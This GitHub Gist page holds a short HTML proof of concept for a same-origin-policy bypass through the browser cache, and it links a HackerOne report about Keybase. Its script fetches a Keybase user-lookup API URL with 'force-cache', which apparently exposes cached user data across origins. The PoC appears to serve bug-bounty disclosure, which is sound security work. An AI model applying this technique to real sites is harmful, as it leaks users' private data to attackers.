Created
December 25, 2019 17:35
-
-
Save andripwn/0e21abb76fe1bd884000f217d178d4a1 to your computer and use it in GitHub Desktop.
SOP bypass using browser cache (https://hackerone.com/reports/761726)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<script> | |
var url = "https://keybase.io/_/api/1.0/user/lookup.json?username={YOUR_USERNAME}"; | |
fetch(url, { | |
method: 'GET', | |
cache: 'force-cache' | |
}); | |
</script> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment